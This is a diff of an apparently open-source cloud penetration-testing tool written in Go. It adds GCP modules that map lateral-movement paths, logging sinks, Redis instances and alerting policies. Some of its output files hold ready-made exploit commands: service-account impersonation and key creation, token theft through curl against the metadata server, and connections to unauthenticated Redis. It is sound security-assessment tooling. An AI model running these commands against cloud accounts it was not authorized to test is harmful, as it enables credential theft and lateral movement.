------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPLateralMovementCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_LATERALMOVEMENT_MODULE_NAME) + if err != nil { + return + } + + module := &LateralMovementModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ImpersonationChains: []ImpersonationChain{}, + TokenTheftVectors: []TokenTheftVector{}, + CrossProjectPaths: []CrossProjectPath{}, + CredentialLocations: []CredentialLocation{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *LateralMovementModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Mapping lateral movement paths...", GCP_LATERALMOVEMENT_MODULE_NAME) + + // Process each project + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_LATERALMOVEMENT_MODULE_NAME, m.processProject) + + // Check results + totalPaths := len(m.ImpersonationChains) + len(m.TokenTheftVectors) + len(m.CrossProjectPaths) + if totalPaths == 0 { + logger.InfoM("No lateral movement paths found", GCP_LATERALMOVEMENT_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d lateral movement path(s): %d impersonation chains, %d token theft vectors, %d cross-project paths", + totalPaths, len(m.ImpersonationChains), len(m.TokenTheftVectors), len(m.CrossProjectPaths)), GCP_LATERALMOVEMENT_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LateralMovementModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing lateral movement paths in project: %s", projectID), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + // 1. Find impersonation chains + m.findImpersonationChains(ctx, projectID, logger) + + // 2. Find token theft vectors (compute instances, functions, etc.) + m.findTokenTheftVectors(ctx, projectID, logger) + + // 3. Find cross-project access + m.findCrossProjectAccess(ctx, projectID, logger) + + // 4. Find credential storage locations + m.findCredentialLocations(ctx, projectID, logger) +} + +// findImpersonationChains finds service account impersonation paths +func (m *LateralMovementModule) findImpersonationChains(ctx context.Context, projectID string, logger internal.Logger) { + iamService := IAMService.New() + + // Get all service accounts + serviceAccounts, err := iamService.ServiceAccounts(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting service accounts: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + } + return + } + + // For each SA, check who can impersonate it using GetServiceAccountIAMPolicy + for _, sa := range serviceAccounts { + impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) + if err != nil { + continue + } + + // Token creators can impersonate + for _, creator := range impersonationInfo.TokenCreators { + // Skip allUsers/allAuthenticatedUsers - those are handled separately + if creator == "allUsers" || creator == "allAuthenticatedUsers" { + continue + } + + chain := ImpersonationChain{ + StartIdentity: creator, + TargetSA: sa.Email, + ChainLength: 1, + Path: []string{creator, sa.Email}, + RiskLevel: "HIGH", + ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", sa.Email), + } + + // If target SA has roles/owner or roles/editor, it's critical + if impersonationInfo.RiskLevel == "CRITICAL" { + chain.RiskLevel = "CRITICAL" + } + + m.mu.Lock() + m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.addImpersonationChainToLoot(chain, projectID) + m.mu.Unlock() + } + + // Key creators can create persistent access + for _, creator := range impersonationInfo.KeyCreators { + if creator == "allUsers" || creator == "allAuthenticatedUsers" { + continue + } + + chain := ImpersonationChain{ + StartIdentity: creator, + TargetSA: sa.Email, + ChainLength: 1, + Path: []string{creator, sa.Email}, + RiskLevel: "CRITICAL", + ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", sa.Email), + } + + m.mu.Lock() + m.ImpersonationChains = append(m.ImpersonationChains, chain) + m.addImpersonationChainToLoot(chain, projectID) + m.mu.Unlock() + } + } +} + +// findTokenTheftVectors finds compute resources where tokens can be stolen +func (m *LateralMovementModule) findTokenTheftVectors(ctx context.Context, projectID string, logger internal.Logger) { + // This would use Compute Engine API to find instances with service accounts + // For now, we'll add the pattern for common token theft vectors + + // Common token theft vectors in GCP: + vectors := []TokenTheftVector{ + { + ResourceType: "compute_instance", + ResourceName: "*", + ProjectID: projectID, + ServiceAccount: "", + AttackVector: "metadata_server", + RiskLevel: "HIGH", + ExploitCommand: `curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token"`, + }, + { + ResourceType: "cloud_function", + ResourceName: "*", + ProjectID: projectID, + ServiceAccount: "", + AttackVector: "function_execution", + RiskLevel: "HIGH", + ExploitCommand: `# Deploy a function that exfiltrates the SA token via metadata server`, + }, + { + ResourceType: "cloud_run", + ResourceName: "*", + ProjectID: projectID, + ServiceAccount: "", + AttackVector: "container_execution", + RiskLevel: "HIGH", + ExploitCommand: `# Access metadata server from within Cloud Run container`, + }, + { + ResourceType: "gke_pod", + ResourceName: "*", + ProjectID: projectID, + ServiceAccount: "", + AttackVector: "pod_service_account", + RiskLevel: "MEDIUM", + ExploitCommand: `kubectl exec -it -- curl -H "Metadata-Flavor: Google" "http://metadata.google.internal/..."`, + }, + } + + m.mu.Lock() + m.TokenTheftVectors = append(m.TokenTheftVectors, vectors...) + for _, v := range vectors { + m.addTokenTheftVectorToLoot(v) + } + m.mu.Unlock() +} + +// findCrossProjectAccess finds IAM bindings that allow cross-project access +func (m *LateralMovementModule) findCrossProjectAccess(ctx context.Context, projectID string, logger internal.Logger) { + iamService := IAMService.New() + + // Get IAM policy for the project using PoliciesWithInheritance for comprehensive view + bindings, err := iamService.PoliciesWithInheritance(projectID) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Error getting IAM policy: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + } + return + } + + // Check each binding for cross-project principals + for _, binding := range bindings { + for _, member := range binding.Members { + // Check if member is from a different project + if strings.Contains(member, "serviceAccount:") && !strings.Contains(member, projectID) { + // Extract the SA's project from the email + saEmail := strings.TrimPrefix(member, "serviceAccount:") + saParts := strings.Split(saEmail, "@") + if len(saParts) >= 2 { + saProject := strings.TrimSuffix(saParts[1], ".iam.gserviceaccount.com") + + crossPath := CrossProjectPath{ + SourceProject: saProject, + TargetProject: projectID, + Principal: saEmail, + Role: binding.Role, + AccessType: "direct", + RiskLevel: m.classifyCrossProjectRisk(binding.Role), + } + + m.mu.Lock() + m.CrossProjectPaths = append(m.CrossProjectPaths, crossPath) + m.addCrossProjectPathToLoot(crossPath) + m.mu.Unlock() + } + } + } + } +} + +// findCredentialLocations identifies where credentials might be stored +func (m *LateralMovementModule) findCredentialLocations(ctx context.Context, projectID string, logger internal.Logger) { + // Common credential storage locations in GCP + locations := []CredentialLocation{ + { + ResourceType: "secret_manager", + ResourceName: "*", + ProjectID: projectID, + CredentialType: "secret", + Description: "Secrets stored in Secret Manager", + RiskLevel: "MEDIUM", + }, + { + ResourceType: "compute_metadata", + ResourceName: "*", + ProjectID: projectID, + CredentialType: "env_var", + Description: "Environment variables in instance metadata", + RiskLevel: "HIGH", + }, + { + ResourceType: "gcs_bucket", + ResourceName: "*", + ProjectID: projectID, + CredentialType: "sa_key", + Description: "Service account keys stored in GCS", + RiskLevel: "CRITICAL", + }, + } + + m.mu.Lock() + m.CredentialLocations = append(m.CredentialLocations, locations...) + m.mu.Unlock() +} + +// classifyCrossProjectRisk determines the risk level of a cross-project binding +func (m *LateralMovementModule) classifyCrossProjectRisk(role string) string { + highRiskRoles := []string{ + "roles/owner", + "roles/editor", + "roles/iam.securityAdmin", + "roles/iam.serviceAccountAdmin", + "roles/iam.serviceAccountTokenCreator", + "roles/iam.serviceAccountKeyAdmin", + } + + for _, hr := range highRiskRoles { + if role == hr { + return "CRITICAL" + } + } + + if strings.Contains(role, "admin") || strings.Contains(role, "Admin") { + return "HIGH" + } + + return "MEDIUM" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LateralMovementModule) initializeLootFiles() { + m.LootMap["lateral-impersonation-chains"] = &internal.LootFile{ + Name: "lateral-impersonation-chains", + Contents: "# Service Account Impersonation Chains\n# Generated by CloudFox\n# These show how one identity can assume another\n\n", + } + m.LootMap["lateral-token-theft"] = &internal.LootFile{ + Name: "lateral-token-theft", + Contents: "# Token Theft Vectors\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } + m.LootMap["lateral-cross-project"] = &internal.LootFile{ + Name: "lateral-cross-project", + Contents: "# Cross-Project Access Paths\n# Generated by CloudFox\n# These show lateral movement opportunities between projects\n\n", + } + m.LootMap["lateral-exploitation"] = &internal.LootFile{ + Name: "lateral-exploitation", + Contents: "# Lateral Movement Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization!\n\n", + } +} + +func (m *LateralMovementModule) addImpersonationChainToLoot(chain ImpersonationChain, projectID string) { + m.LootMap["lateral-impersonation-chains"].Contents += fmt.Sprintf( + "## Chain: %s -> %s\n"+ + "Risk: %s\n"+ + "Path: %s\n"+ + "Command: %s\n\n", + chain.StartIdentity, + chain.TargetSA, + chain.RiskLevel, + strings.Join(chain.Path, " -> "), + chain.ExploitCommand, + ) + + if chain.RiskLevel == "CRITICAL" || chain.RiskLevel == "HIGH" { + m.LootMap["lateral-exploitation"].Contents += fmt.Sprintf( + "# Impersonation: %s -> %s (%s)\n"+ + "%s\n\n", + chain.StartIdentity, + chain.TargetSA, + chain.RiskLevel, + chain.ExploitCommand, + ) + } +} + +func (m *LateralMovementModule) addTokenTheftVectorToLoot(vector TokenTheftVector) { + m.LootMap["lateral-token-theft"].Contents += fmt.Sprintf( + "## %s: %s\n"+ + "Project: %s\n"+ + "Service Account: %s\n"+ + "Attack Vector: %s\n"+ + "Risk: %s\n"+ + "Command:\n%s\n\n", + vector.ResourceType, + vector.ResourceName, + vector.ProjectID, + vector.ServiceAccount, + vector.AttackVector, + vector.RiskLevel, + vector.ExploitCommand, + ) +} + +func (m *LateralMovementModule) addCrossProjectPathToLoot(path CrossProjectPath) { + m.LootMap["lateral-cross-project"].Contents += fmt.Sprintf( + "## %s -> %s\n"+ + "Principal: %s\n"+ + "Role: %s\n"+ + "Access Type: %s\n"+ + "Risk: %s\n\n", + path.SourceProject, + path.TargetProject, + path.Principal, + path.Role, + path.AccessType, + path.RiskLevel, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LateralMovementModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Impersonation chains table + chainsHeader := []string{ + "Start Identity", + "Target SA", + "Chain Length", + "Risk", + "Exploit Command", + } + + var chainsBody [][]string + for _, chain := range m.ImpersonationChains { + chainsBody = append(chainsBody, []string{ + truncateString(chain.StartIdentity, 40), + truncateString(chain.TargetSA, 40), + fmt.Sprintf("%d", chain.ChainLength), + chain.RiskLevel, + truncateString(chain.ExploitCommand, 50), + }) + } + + // Token theft vectors table + vectorsHeader := []string{ + "Resource Type", + "Resource", + "Project", + "Attack Vector", + "Risk", + } + + var vectorsBody [][]string + for _, vector := range m.TokenTheftVectors { + vectorsBody = append(vectorsBody, []string{ + vector.ResourceType, + truncateString(vector.ResourceName, 30), + vector.ProjectID, + vector.AttackVector, + vector.RiskLevel, + }) + } + + // Cross-project paths table + crossHeader := []string{ + "Source Project", + "Target Project", + "Principal", + "Role", + "Risk", + } + + var crossBody [][]string + for _, path := range m.CrossProjectPaths { + crossBody = append(crossBody, []string{ + path.SourceProject, + path.TargetProject, + truncateString(path.Principal, 40), + path.Role, + path.RiskLevel, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + tables := []internal.TableFile{} + + if len(chainsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-impersonation-chains", + Header: chainsHeader, + Body: chainsBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d impersonation chain(s)", len(chainsBody)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + if len(vectorsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-token-theft", + Header: vectorsHeader, + Body: vectorsBody, + }) + } + + if len(crossBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "lateral-cross-project", + Header: crossHeader, + Body: crossBody, + }) + logger.InfoM(fmt.Sprintf("[PENTEST] Found %d cross-project path(s)", len(crossBody)), GCP_LATERALMOVEMENT_MODULE_NAME) + } + + output := LateralMovementOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_LATERALMOVEMENT_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/logging.go b/gcp/commands/logging.go index 4ec0de54..baa2a29b 100644 --- a/gcp/commands/logging.go +++ b/gcp/commands/logging.go @@ -183,6 +183,27 @@ func (m *LoggingModule) initializeLootFiles() { Name: "logging-exploitation", Contents: "# Logging Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", } + // New enhancement loot files + m.LootMap["logging-disabled-sinks"] = &internal.LootFile{ + Name: "logging-disabled-sinks", + Contents: "# Disabled Logging Sinks\n# These sinks are not exporting logs - potential log evasion\n# Generated by CloudFox\n\n", + } + m.LootMap["logging-exclusion-filters"] = &internal.LootFile{ + Name: "logging-exclusion-filters", + Contents: "# Logging Sink Exclusion Filters\n# These filters exclude specific logs from export\n# Generated by CloudFox\n\n", + } + m.LootMap["logging-storage-destinations"] = &internal.LootFile{ + Name: "logging-storage-destinations", + Contents: "# Cloud Storage Log Destinations\n# Log export buckets to investigate\n# Generated by CloudFox\n\n", + } + m.LootMap["logging-bigquery-destinations"] = &internal.LootFile{ + Name: "logging-bigquery-destinations", + Contents: "# BigQuery Log Destinations\n# Log export datasets for querying\n# Generated by CloudFox\n\n", + } + m.LootMap["logging-security-recommendations"] = &internal.LootFile{ + Name: "logging-security-recommendations", + Contents: "# Cloud Logging Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { @@ -224,6 +245,83 @@ func (m *LoggingModule) addSinkToLoot(sink LoggingService.SinkInfo) { ) } + // Disabled sinks - potential log evasion + if sink.Disabled { + m.LootMap["logging-disabled-sinks"].Contents += fmt.Sprintf( + "# DISABLED SINK: %s\n"+ + "# Project: %s\n"+ + "# Destination: %s (%s)\n"+ + "# This sink is not exporting logs!\n"+ + "# Re-enable: gcloud logging sinks update %s --no-disabled --project=%s\n\n", + sink.Name, + sink.ProjectID, + sink.DestinationType, getDestinationName(sink), + sink.Name, sink.ProjectID, + ) + } + + // Exclusion filters - may hide malicious activity + if len(sink.ExclusionFilters) > 0 { + m.LootMap["logging-exclusion-filters"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "# Destination: %s\n"+ + "# Exclusion Filters (%d):\n", + sink.Name, sink.ProjectID, + getDestinationName(sink), + len(sink.ExclusionFilters), + ) + for i, filter := range sink.ExclusionFilters { + m.LootMap["logging-exclusion-filters"].Contents += fmt.Sprintf( + "# [%d] %s\n", + i+1, filter, + ) + } + m.LootMap["logging-exclusion-filters"].Contents += "\n" + } + + // Storage destinations + if sink.DestinationType == "storage" && sink.DestinationBucket != "" { + m.LootMap["logging-storage-destinations"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "# Bucket: %s\n"+ + "# Cross-Project: %v\n"+ + "gsutil ls gs://%s/\n"+ + "gsutil ls -r gs://%s/ | head -50\n"+ + "# Sample logs:\n"+ + "gsutil cat gs://%s/$(gsutil ls gs://%s/ | head -1)/*.json 2>/dev/null | head -20\n\n", + sink.Name, sink.ProjectID, + sink.DestinationBucket, + sink.IsCrossProject, + sink.DestinationBucket, + sink.DestinationBucket, + sink.DestinationBucket, sink.DestinationBucket, + ) + } + + // BigQuery destinations + if sink.DestinationType == "bigquery" && sink.DestinationDataset != "" { + destProject := sink.DestinationProject + if destProject == "" { + destProject = sink.ProjectID + } + m.LootMap["logging-bigquery-destinations"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n"+ + "# Dataset: %s.%s\n"+ + "# Cross-Project: %v\n"+ + "bq ls %s:%s\n"+ + "# Query recent logs:\n"+ + "bq query --use_legacy_sql=false 'SELECT * FROM `%s.%s.*` WHERE timestamp > TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL 1 DAY) LIMIT 100'\n\n", + sink.Name, sink.ProjectID, + destProject, sink.DestinationDataset, + sink.IsCrossProject, + destProject, sink.DestinationDataset, + destProject, sink.DestinationDataset, + ) + } + + // Add security recommendations + m.addSinkSecurityRecommendations(sink) + // Exploitation commands m.LootMap["logging-exploitation"].Contents += fmt.Sprintf( "# Sink: %s (Project: %s)\n"+ @@ -440,3 +538,84 @@ func truncateFilter(filter string) string { } return filter } + +// ------------------------------ +// Security Recommendations +// ------------------------------ + +// addSinkSecurityRecommendations generates security recommendations for a logging sink +func (m *LoggingModule) addSinkSecurityRecommendations(sink LoggingService.SinkInfo) { + var recommendations []string + + // Disabled sink - CRITICAL (log evasion) + if sink.Disabled { + recommendations = append(recommendations, + fmt.Sprintf("[CRITICAL] Sink %s is DISABLED - logs are not being exported\n"+ + " Risk: Potential log evasion or security monitoring gap\n"+ + " Fix: Re-enable the sink:\n"+ + " gcloud logging sinks update %s --no-disabled --project=%s\n", + sink.Name, + sink.Name, sink.ProjectID)) + } + + // Cross-project export - HIGH (data exfiltration risk) + if sink.IsCrossProject { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] Sink %s exports logs to different project: %s\n"+ + " Risk: Logs may be exfiltrated to external project\n"+ + " Review: Verify this cross-project export is authorized\n"+ + " gcloud logging sinks describe %s --project=%s\n", + sink.Name, sink.DestinationProject, + sink.Name, sink.ProjectID)) + } + + // Exclusion filters - HIGH (may hide malicious activity) + if len(sink.ExclusionFilters) > 0 { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] Sink %s has %d exclusion filter(s)\n"+ + " Risk: Exclusion filters may hide malicious activity from logs\n"+ + " Review: Verify exclusion filters are appropriate\n"+ + " gcloud logging sinks describe %s --project=%s\n", + sink.Name, len(sink.ExclusionFilters), + sink.Name, sink.ProjectID)) + } + + // No filter (exports all logs) - MEDIUM + if sink.Filter == "" { + recommendations = append(recommendations, + fmt.Sprintf("[MEDIUM] Sink %s has no filter - exports ALL logs\n"+ + " Risk: Sensitive logs may be exported, increased storage costs\n"+ + " Consider: Adding a filter to export only necessary logs\n"+ + " gcloud logging sinks update %s --log-filter='severity>=WARNING' --project=%s\n", + sink.Name, + sink.Name, sink.ProjectID)) + } + + // Storage destination without CMEK - LOW + if sink.DestinationType == "storage" { + recommendations = append(recommendations, + fmt.Sprintf("[LOW] Sink %s exports to Cloud Storage bucket: %s\n"+ + " Review: Verify bucket has appropriate encryption and access controls\n"+ + " gsutil iam get gs://%s\n", + sink.Name, sink.DestinationBucket, + sink.DestinationBucket)) + } + + // Pub/Sub destination - INFO (real-time access) + if sink.DestinationType == "pubsub" { + recommendations = append(recommendations, + fmt.Sprintf("[INFO] Sink %s exports to Pub/Sub topic: %s\n"+ + " Note: Logs are available in real-time via Pub/Sub\n"+ + " Review: Check who can subscribe to this topic\n"+ + " gcloud pubsub topics get-iam-policy %s --project=%s\n", + sink.Name, sink.DestinationTopic, + sink.DestinationTopic, sink.DestinationProject)) + } + + if len(recommendations) > 0 { + m.LootMap["logging-security-recommendations"].Contents += fmt.Sprintf( + "# Sink: %s (Project: %s)\n%s\n", + sink.Name, sink.ProjectID, + strings.Join(recommendations, "\n")) + } +} diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go index 1819337f..910d3eb1 100644 --- a/gcp/commands/memorystore.go +++ b/gcp/commands/memorystore.go @@ -110,9 +110,34 @@ func (m *MemorystoreModule) initializeLootFiles() { Name: "memorystore-endpoints", Contents: "", } + m.LootMap["memorystore-gcloud-commands"] = &internal.LootFile{ + Name: "memorystore-gcloud-commands", + Contents: "# Memorystore gcloud Commands\n# Generated by CloudFox\n\n", + } + m.LootMap["memorystore-no-auth"] = &internal.LootFile{ + Name: "memorystore-no-auth", + Contents: "# Redis Instances WITHOUT Authentication\n# These instances have no AUTH - anyone with network access can connect\n# Generated by CloudFox\n\n", + } + m.LootMap["memorystore-no-encryption"] = &internal.LootFile{ + Name: "memorystore-no-encryption", + Contents: "# Redis Instances WITHOUT Transit Encryption\n# Traffic to these instances is unencrypted\n# Generated by CloudFox\n\n", + } + m.LootMap["memorystore-networks"] = &internal.LootFile{ + Name: "memorystore-networks", + Contents: "# Redis Instance Network Configuration\n# Shows which VPCs can access each instance\n# Generated by CloudFox\n\n", + } + m.LootMap["memorystore-exploitation"] = &internal.LootFile{ + Name: "memorystore-exploitation", + Contents: "# Memorystore Exploitation Commands\n# WARNING: Only use with proper authorization\n# Generated by CloudFox\n\n", + } + m.LootMap["memorystore-security-recommendations"] = &internal.LootFile{ + Name: "memorystore-security-recommendations", + Contents: "# Memorystore Security Recommendations\n# Generated by CloudFox\n\n", + } } func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisInstanceInfo) { + // Basic instance info m.LootMap["memorystore-instances"].Contents += fmt.Sprintf( "# Instance: %s\n# Host: %s:%d\n# Auth: %v\n# Encryption: %s\n\n", instance.Name, @@ -122,6 +147,174 @@ func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisI instance.TransitEncryption, ) m.LootMap["memorystore-endpoints"].Contents += fmt.Sprintf("%s:%d\n", instance.Host, instance.Port) + + // gcloud commands + m.LootMap["memorystore-gcloud-commands"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s, Region: %s)\n"+ + "gcloud redis instances describe %s --region=%s --project=%s\n"+ + "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", + instance.Name, instance.ProjectID, instance.Location, + instance.Name, instance.Location, instance.ProjectID, + instance.Name, instance.Location, instance.ProjectID, + ) + + // No-auth instances + if !instance.AuthEnabled { + m.LootMap["memorystore-no-auth"].Contents += fmt.Sprintf( + "# INSTANCE: %s\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# Host: %s:%d\n"+ + "# Network: %s\n"+ + "# RISK: No authentication - anyone with VPC access can connect!\n"+ + "redis-cli -h %s -p %d\n\n", + instance.Name, + instance.ProjectID, + instance.Location, + instance.Host, instance.Port, + extractNetworkName(instance.AuthorizedNetwork), + instance.Host, instance.Port, + ) + } + + // No-encryption instances + if instance.TransitEncryption == "DISABLED" || instance.TransitEncryption == "" { + m.LootMap["memorystore-no-encryption"].Contents += fmt.Sprintf( + "# INSTANCE: %s\n"+ + "# Project: %s\n"+ + "# Location: %s\n"+ + "# Host: %s:%d\n"+ + "# RISK: No transit encryption - traffic is unencrypted!\n"+ + "# Enable encryption (requires downtime):\n"+ + "gcloud redis instances update %s --region=%s --project=%s --transit-encryption-mode=SERVER_AUTHENTICATION\n\n", + instance.Name, + instance.ProjectID, + instance.Location, + instance.Host, instance.Port, + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Network configuration + m.LootMap["memorystore-networks"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s)\n"+ + "# Host: %s:%d\n"+ + "# Authorized Network: %s\n"+ + "# Connect Mode: %s\n"+ + "# Reserved IP Range: %s\n\n", + instance.Name, instance.ProjectID, + instance.Host, instance.Port, + instance.AuthorizedNetwork, + instance.ConnectMode, + instance.ReservedIPRange, + ) + + // Exploitation commands + authStr := "" + if instance.AuthEnabled { + authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + + " --region=" + instance.Location + " --project=" + instance.ProjectID + + " --format='value(authString)')" + } + m.LootMap["memorystore-exploitation"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s)\n"+ + "# Host: %s:%d\n"+ + "# Auth: %v, Encryption: %s\n"+ + "# Risk Level: %s\n\n"+ + "# Connect to Redis (from a VM in the same VPC):\n"+ + "redis-cli -h %s -p %d%s\n\n"+ + "# Common Redis commands for enumeration:\n"+ + "# INFO - Server info and stats\n"+ + "# CONFIG GET * - All configuration\n"+ + "# KEYS * - List all keys (CAREFUL: may be slow)\n"+ + "# SCAN 0 COUNT 100 - Iterate keys safely\n"+ + "# GET key - Get value\n"+ + "# DBSIZE - Number of keys\n\n", + instance.Name, instance.ProjectID, + instance.Host, instance.Port, + instance.AuthEnabled, instance.TransitEncryption, + instance.RiskLevel, + instance.Host, instance.Port, authStr, + ) + + // Add security recommendations + m.addRedisSecurityRecommendations(instance) +} + +// extractNetworkName extracts the network name from the full resource path +func extractNetworkName(network string) string { + if network == "" { + return "default" + } + parts := strings.Split(network, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return network +} + +// addRedisSecurityRecommendations generates security recommendations for a Redis instance +func (m *MemorystoreModule) addRedisSecurityRecommendations(instance memorystoreservice.RedisInstanceInfo) { + var recommendations []string + + // No authentication - CRITICAL + if !instance.AuthEnabled { + recommendations = append(recommendations, + fmt.Sprintf("[CRITICAL] Instance %s has NO authentication enabled\n"+ + " Risk: Anyone with network access to the VPC can connect and read/write data\n"+ + " Fix: Enable AUTH (requires recreating instance):\n"+ + " gcloud redis instances create %s-new --region=%s --project=%s --auth-enabled\n", + instance.Name, + instance.Name, instance.Location, instance.ProjectID)) + } + + // No transit encryption - HIGH + if instance.TransitEncryption == "DISABLED" || instance.TransitEncryption == "" { + recommendations = append(recommendations, + fmt.Sprintf("[HIGH] Instance %s has NO transit encryption\n"+ + " Risk: Redis traffic can be sniffed on the network\n"+ + " Fix: Enable transit encryption:\n"+ + " gcloud redis instances update %s --region=%s --project=%s --transit-encryption-mode=SERVER_AUTHENTICATION\n", + instance.Name, + instance.Name, instance.Location, instance.ProjectID)) + } + + // Basic tier (no HA) - MEDIUM + if instance.Tier == "BASIC" { + recommendations = append(recommendations, + fmt.Sprintf("[MEDIUM] Instance %s uses BASIC tier (no high availability)\n"+ + " Risk: Single point of failure, no automatic failover\n"+ + " Consider: Upgrading to STANDARD_HA tier for production workloads\n"+ + " gcloud redis instances create %s-ha --region=%s --project=%s --tier=STANDARD_HA\n", + instance.Name, + instance.Name, instance.Location, instance.ProjectID)) + } + + // Default network - LOW + if strings.Contains(instance.AuthorizedNetwork, "/default") { + recommendations = append(recommendations, + fmt.Sprintf("[LOW] Instance %s is connected to the default network\n"+ + " Risk: Default networks have broad firewall rules\n"+ + " Consider: Using a dedicated VPC with restricted access\n", + instance.Name)) + } + + // Old Redis version - INFO + if strings.HasPrefix(instance.RedisVersion, "REDIS_4") || strings.HasPrefix(instance.RedisVersion, "REDIS_5") { + recommendations = append(recommendations, + fmt.Sprintf("[INFO] Instance %s uses an older Redis version: %s\n"+ + " Note: Consider upgrading to Redis 7.x for better security and performance\n"+ + " gcloud redis instances upgrade %s --redis-version=redis_7_0 --region=%s --project=%s\n", + instance.Name, instance.RedisVersion, + instance.Name, instance.Location, instance.ProjectID)) + } + + if len(recommendations) > 0 { + m.LootMap["memorystore-security-recommendations"].Contents += fmt.Sprintf( + "# Instance: %s (Project: %s)\n%s\n", + instance.Name, instance.ProjectID, + strings.Join(recommendations, "\n")) + } } func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go new file mode 100644 index 00000000..5492f338 --- /dev/null +++ b/gcp/commands/monitoringalerts.go @@ -0,0 +1,912 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + monitoring "cloud.google.com/go/monitoring/apiv3/v2" + "cloud.google.com/go/monitoring/apiv3/v2/monitoringpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" + +var GCPMonitoringAlertsCommand = &cobra.Command{ + Use: GCP_MONITORINGALERTS_MODULE_NAME, + Aliases: []string{"alerts", "monitoring", "alerting"}, + Short: "Enumerate Cloud Monitoring alerting policies and notification channels", + Long: `Analyze Cloud Monitoring alerting policies and notification channels for security gaps. + +Features: +- Lists all alerting policies and their conditions +- Identifies disabled or misconfigured alerts +- Enumerates notification channels and their verification status +- Detects missing critical security alerts +- Identifies uptime check configurations +- Analyzes alert policy coverage gaps + +Required Security Alerts to Check: +- IAM policy changes +- Firewall rule changes +- VPC network changes +- Service account key creation +- Custom role changes +- Audit log configuration changes +- Cloud SQL authorization changes + +Requires appropriate IAM permissions: +- roles/monitoring.viewer +- roles/monitoring.alertPolicyViewer`, + Run: runGCPMonitoringAlertsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AlertPolicy struct { + Name string + DisplayName string + ProjectID string + Enabled bool + ConditionCount int + NotificationCount int + Combiner string + CreationRecord string + MutationRecord string + Severity string + Documentation string + Conditions []AlertCondition +} + +type AlertCondition struct { + Name string + DisplayName string + ResourceType string + MetricType string + Filter string + ThresholdValue float64 + 